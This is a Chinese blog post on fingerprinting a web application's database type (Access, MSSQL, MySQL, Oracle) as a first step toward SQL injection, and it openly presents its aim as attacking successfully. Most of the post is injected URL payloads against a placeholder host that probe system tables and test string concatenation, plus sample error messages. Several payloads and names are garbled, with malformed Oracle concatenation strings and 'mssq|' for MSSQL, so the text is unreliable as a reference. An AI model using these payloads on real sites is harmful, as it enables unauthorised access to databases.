当前位置:首页 » sql注入 » 正文

怎么判断数据库类型

1054 人参与  2020年11月08日 11:20  分类 : sql注入  

sq6.jpg

想要成功的发动SQL注入攻击,最重要的是知道应用正在使用的数据库类型和版本。没有这一信息就不可能向查询注入信息并提取自己所感兴趣的数据,正所谓知己知彼百战百胜。
一:常见构架判断数据库类型

asp + access
asp + mssq|
asp.net + mssq|
php + mysq|
jsp + oracle
jsp+mysq|

二:利用一些特征判断数据库类型
报错信息:
Oracle:ORA-01756:括号内的字符串没有正确结束
Mysql: ERROR 1064 (42000): You have an error in yourSQL syntax; check the manual that corresponds to yourMySQL server version for the right syntax to use near
MSSQL: [Microsoft][ODBC SQL Server Driver][SQL Server]字符串’’之前有未闭合的引号

三:通过特有数据表进行判断

MSQQL数据库:

http://host/test.php?id=15 and (select count(*) from
sysobjects)>0 and 1=1

Access数据库:
http://host/test.php?id=15 and (select count(*) from
msysobjects)>0 and 1=1

Mysq|数据库:
http://host/test.php?id=15 and (select count(*) from
information_ schema. TABLES)>0 and 1=1

Oracle数据库:
http://host/test.php?id=15 and (select count(*) from
sys.user_ tables)>0 and 1=1

四:使用字符连接方式判断数据库类型

MSSQL数据库:
http://host/test.php?id=15 and“1'+'1'='11'

MySq|数据库:
http://host/test.php?id=15 and‘1'+'1'='11'
http://host/test.php?id=15 and CONCAT('1','1')='11'


Oracle数据库:
http://host/test.php?id=15 and 11'1'='11'
http://host/test.php?id=15 and CONCAT(1','1')='11'

来源:零零博客(微信/QQ号:1586173648),转载请保留出处和链接!

本文链接:https://www.00bk.cn/wz/14.html

<< 上一篇 下一篇 >>

零零博客

网站地图 | 数码资讯 | 9911影视 | 频道号 | 互联网络 | 秒懂知识

赣ICP备2021007898号-1